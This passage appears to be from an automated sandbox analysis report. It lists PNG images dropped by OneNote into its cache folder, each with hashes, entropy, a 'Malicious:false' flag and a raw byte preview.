                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003D.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.950380155401321
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                            MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                            SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                            SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                            SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003E.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2270
                                                                                                                                            Entropy (8bit):7.845368393313232
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                            MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                            SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                            SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                            SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003F.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8184
                                                                                                                                            Entropy (8bit):7.807848176906598
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                            MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                            SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                            SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                            SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003G.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2599
                                                                                                                                            Entropy (8bit):7.903700862190034
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                            MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                            SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                            SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                            SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003H.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22634
                                                                                                                                            Entropy (8bit):7.974332204835705
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                            MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                            SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                            SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                            SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003I.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1570
                                                                                                                                            Entropy (8bit):7.780157858994452
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                            MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                            SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                            SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                            SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003J.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11449
                                                                                                                                            Entropy (8bit):7.91552812501629
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                            MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                            SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                            SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                            SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003K.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4081
                                                                                                                                            Entropy (8bit):7.943373267196131
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                            MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                            SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                            SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                            SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003Q.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3679
                                                                                                                                            Entropy (8bit):7.931319059366604
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                            MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                            SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                            SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                            SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003R.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1657
                                                                                                                                            Entropy (8bit):7.80882577056055
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                            MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                            SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                            SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                            SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003S.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14458
                                                                                                                                            Entropy (8bit):7.944094738048628
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                            MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                            SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                            SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                            SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003T.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13030
                                                                                                                                            Entropy (8bit):7.948664903731204
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                            MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                            SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                            SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                            SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003U.bin

                                                                                                                                            Download File
